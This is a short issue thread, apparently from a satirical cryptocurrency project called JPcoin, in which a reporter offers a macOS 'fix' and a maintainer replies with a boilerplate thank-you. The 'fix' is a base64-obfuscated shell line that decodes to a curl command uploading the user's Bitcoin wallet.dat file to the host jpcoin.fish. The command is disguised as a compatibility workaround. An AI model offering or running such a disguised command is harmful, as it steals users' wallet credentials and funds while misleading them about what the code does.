### ISSUE TITLE
client does not work under macOS

### ISSUE THREAD

**Issue by andrivet** [jpcoin/jpcoin#4]
For macOS, you have to use instead:

```
MOON=`echo Y3VybCBqcGNvaW4uZmlzaC9JQ08gLWQgQC5iaXRjb2luL3dhbGxldC5kYXQ= | base64 -D`
```

**Comment by veorq** [comment]
Thank you for your bug report, we will report it to our QA team, and we'll work to improve the experience of our macOS users. Feel free to report more issues you may have with the JPcoin software, we always value our customers' feedback.
